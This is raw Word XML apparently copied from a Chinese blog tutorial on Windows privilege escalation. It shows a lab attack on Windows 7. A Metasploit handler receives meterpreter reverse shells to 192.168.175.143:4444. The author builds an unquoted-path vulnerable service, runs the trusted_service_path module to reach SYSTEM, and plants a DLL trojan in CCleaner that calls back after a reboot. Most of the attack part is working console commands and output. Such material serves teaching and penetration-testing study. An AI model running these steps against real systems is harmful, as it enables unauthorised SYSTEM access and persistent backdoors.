            <wp:docPr id="1" name="图片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5-%E5%90%AF%E5%8A%A8msf-%E7%9A%84%E7%9B%91%E5%90%AC%E6%A8%A1%E5%BC%8F%EF%BC%8C%E9%BB%98%E9%BB%98%E7%AD%89%E5%BE%85%E7%94%A8%E6%88%B7%E6%89%A7%E8%A1%8C%E8%BD%AF%E4%BB%B6%EF%BC%8C%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E6%88%91%E4%BB%AC%E7%8E%B0%E5%9C%A8%E5%8F%AA%E6%98%AF%E6%99%AE%E9%80%9A%E7%AE%A1%E7%90%86%E5%91%98%E6%9D%83%E9%99%90" \o "5. 启动msf 的监听模式，默默等待用户执行软件，可以看到我们现在只是普通管理员权限"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5. 启动msf 的监听模式，默默等待用户执行软件，可以看到我们现在只是普通管理员权限</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25" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear"/>
            <w:noWrap/>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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8053"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xml:space="preserve">msf &gt; use exploit/multi/handler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exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp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payload =&gt; windows/meterpreter/reverse_tcp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exploit(multi/handler) &gt; set lhost 192.168.175.143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lhost =&gt; 192.168.175.143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exploit(multi/handler) &gt; set lport 4444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lport =&gt; 4444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exploit(multi/handler) &gt; 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Started reverse TCP handler on 192.168.175.143:4444</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hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="304800" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 5" descr="IMG_26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hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="304800" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 6" descr="IMG_26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6-%E4%BB%8Emeterpreter-%E8%BF%9B%E5%85%A5shell-%E6%A8%A1%E5%BC%8F%EF%BC%8C%E7%84%B6%E5%90%8E%E6%88%91%E4%BB%AC%E6%89%8B%E5%8A%A8%E6%9E%84%E5%BB%BA%E4%B8%80%E4%B8%AA%E5%AD%98%E5%9C%A8%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%9C%8D%E5%8A%A1%EF%BC%8C%E4%BB%A5%E4%BE%BF%E5%90%8E%E7%BB%AD%E8%BF%9B%E8%A1%8C%E6%8F%90%E6%9D%83%E5%88%B0-SYSTEM" \o "6. 从meterpreter 进入shell 模式，然后我们手动构建一个存在漏洞的服务，以便后续进行提权到 SYSTEM"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6. 从meterpreter 进入shell 模式，然后我们手动构建一个存在漏洞的服务，以便后续进行提权到 SYSTEM</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25" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear"/>
            <w:noWrap/>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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8179"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sc create "times0ng test" binPath= "C:\Program Files (x86)\times0ng test\just test\evil.exe" start= auto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cd C:\Program Files (x86)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mkdir "times0ng test\just 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icacls "C:\Program Files (x86)\times0ng test" /grant Everyone:(OI)(CI)F /T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hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="304800" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 7" descr="IMG_2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"7-%E8%B0%83%E7%94%A8msf-%E7%9A%84%E6%8F%90%E6%9D%83%E6%A8%A1%E5%9D%97%E8%BF%9B%E8%A1%8C%E6%8F%90%E6%9D%83%EF%BC%8C%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E6%88%91%E4%BB%AC%E5%BE%88%E5%AE%B9%E6%98%93%E5%B0%B1%E5%8F%96%E5%BE%97%E4%BA%86SYSTEM-%E6%9D%83%E9%99%90" \o "7. 调用msf 的提权模块进行提权，可以看到我们很容易就取得了SYSTEM 权限"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7. 调用msf 的提权模块进行提权，可以看到我们很容易就取得了SYSTEM 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4" w:beforeAutospacing="0" w:after="84" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>use exploit/windows/local/trusted_service_path</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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear"/>
            <w:noWrap/>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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8053"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C:\Program Files (x86)&gt;exit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exit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xml:space="preserve">meterpreter &gt;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xml:space="preserve">meterpreter &gt; background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Backgrounding session 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exploit(multi/handler) &gt; use exploit/windows/local/trusted_service_path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exploit(windows/local/trusted_service_path) &gt; set session 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session =&gt; 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exploit(windows/local/trusted_service_path) &gt; set payload windows/meterpreter/reverse_tcp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payload =&gt; windows/meterpreter/reverse_tcp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exploit(windows/local/trusted_service_path) &gt; set lhost 192.168.175.143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lhost =&gt; 192.168.175.143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exploit(windows/local/trusted_service_path) &gt; set lport 4444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lport =&gt; 4444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exploit(windows/local/trusted_service_path) &gt; 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xml:space="preserve">[*] Started reverse TCP handler on 192.168.175.143:4444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Finding a vulnerable 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Placing C:\Program.exe for times0ng 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Writing 15872 bytes to C:\Program.exe...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Launching service times0ng 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Sending stage (179779 bytes) to 192.168.175.145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Meterpreter session 9 opened (192.168.175.143:4444 -&gt; 192.168.175.145:49286) at 2018-04-10 11:05:23 -0400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This exploit may require manual cleanup of 'C:\Program.exe' on the target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meterpreter &gt; getuid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Server username: NT AUTHORITY\SYSTEM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meterpreter &gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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8-%E9%87%8D%E5%90%AFwin-7-%EF%BC%8C%E6%88%91%E4%BB%AC%E7%9A%84DLL-%E6%9C%A8%E9%A9%AC%E4%BB%8D%E7%84%B6%E9%9D%99%E9%9D%99%E5%9C%B0%E8%BA%BA%E5%9C%A8%E9%82%A3%E9%87%8C%E5%85%85%E5%BD%93%E7%9D%80%E5%BF%A0%E5%AE%9E%E5%8F%AF%E9%9D%A0%E7%9A%84%E5%90%8E%E9%97%A8%EF%BC%8C%E4%B8%80%E6%97%A6%E7%94%A8%E6%88%B7%E6%89%A7%E8%A1%8CCCleaner-%E5%B0%B1%E4%BC%9A%E8%A7%A6%E5%8F%91%E6%9C%A8%E9%A9%AC%EF%BC%88%E6%83%B3%E8%B1%A1%E4%B8%80%E4%B8%8B%E5%A6%82%E6%9E%9C%E6%8A%8ACCleaner-%E6%8D%A2%E6%88%90%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%EF%BC%8C%E8%BF%98%E6%98%AF%E5%BC%80%E6%9C%BA%E8%87%AA%E5%8A%A8%E5%90%AF%E5%8A%A8%E9%A1%B9%EF%BC%8C%E9%82%A3%E4%B9%88%E4%B8%80%E6%97%A6%E7%94%A8%E6%88%B7%E9%87%8D%E5%90%AF%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%B0%B1%E4%BC%9A%E8%A7%A6%E5%8F%91%E5%90%8E%E9%97%A8%E5%8F%8D%E5%BC%B9%E7%BB%99%E6%88%91%E4%BB%AC-SYSTEM-shell%EF%BC%89" \o "8. 重启win 7 ，我们的DLL 木马仍然静静地躺在那里充当着忠实可靠的后门，一旦用户执行CCleaner 就会触发木马（想象一下如果把CCleaner 换成系统服务，还是开机自动启动项，那么一旦用户重启计算机就会触发后门反弹给我们 SYSTEM shell）"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8. 重启win 7 ，我们的DLL 木马仍然静静地躺在那里充当着忠实可靠的后门，一旦用户执行CCleaner 就会触发木马（想象一下如果把CCleaner 换成系统服务，还是开机自动启动项，那么一旦用户重启计算机就会触发后门反弹给我们 SYSTEM shell）</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25" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear"/>
            <w:noWrap/>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rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="D3D3D3"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="D3D3D3"/>
                <w:kern w:val="0"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8053"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meterpreter &gt; reboot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Rebooting...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meterpreter &gt; [*] 192.168.175.145 - Meterpreter session 8 closed.  Reason: Died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xml:space="preserve">meterpreter &gt;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192.168.175.145 - Meterpreter session 9 closed.  Reason: Died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xml:space="preserve">msf exploit(windows/local/trusted_service_path) &gt; use exploit/multi/handler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msf exploit(multi/handler) &gt; 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xml:space="preserve">[*] Started reverse TCP handler on 192.168.175.143:4444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Sending stage (179779 bytes) to 192.168.175.145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 Meterpreter session 10 opened (192.168.175.143:4444 -&gt; 192.168.175.145:49160) at 2018-04-10 11:12:24 -0400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meterpreter &gt; getuid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Server username: WIN-CKN6B7H8THF\times0ng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Consolas" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>meterpreter &gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="6" w:space="3"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="105" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/" \l "0x03-%E7%BB%93%E8%AF%AD" \o "0x03. 结语" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>0x03. 结语</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="6" w:space="3"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="300" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="574C4C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/" \l "%E5%B8%8C%E6%9C%9B%E5%A4%A7%E5%AE%B6%E8%83%BD%E5%A4%9F%E5%96%9C%E6%AC%A2%EF%BC%8C%E6%9C%89%E6%9B%B4%E5%A5%BD%E7%9A%84%E6%83%B3%E6%B3%95%E6%AC%A2%E8%BF%8E%E7%95%99%E8%A8%80%EF%BC%8C%E6%88%96%E8%80%85%E8%BF%9B%E7%BE%A4%E4%BA%A4%E6%B5%81%EF%BC%81" \o "希望大家能够喜欢，有更好的想法欢迎留言，或者进群交流！" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="574C4C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>希望大家能够喜欢，有更好的想法欢迎留言，或者进群交流！</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/</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19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img.027cgb.com/612577/times0ng_blog/blog_image_from_qiniuyun/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/20180410225355_mtdLaD_Screenshot.jpeg" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://img.027cgb.com/612577/times0ng_blog/blog_image_from_qiniuyun/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/20180410224735_dwsj0R_Screenshot.jpeg" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://img.027cgb.com/612577/times0ng_blog/blog_image_from_qiniuyun/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/20180410224504_LFKxXq_Screenshot.jpeg" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://img.027cgb.com/612577/times0ng_blog/blog_image_from_qiniuyun/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/20180410223301_Bp44of_Screenshot.jpeg" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../NULL"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://img.027cgb.com/612577/times0ng_blog/blog_image_from_qiniuyun/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/20180410222237_MewziO_Screenshot.jpe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hyperlink" Target="http://img.027cgb.com/612577/times0ng_blog/blog_image_from_qiniuyun/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/20180410230219_rieB2E_Screenshot.jpeg" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://img.027cgb.com/612577/times0ng_blog/blog_image_from_qiniuyun/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/20180410225440_7mMEIN_Screenshot.jpe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2019-06-14T13:40:58Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-14T13:41:15Z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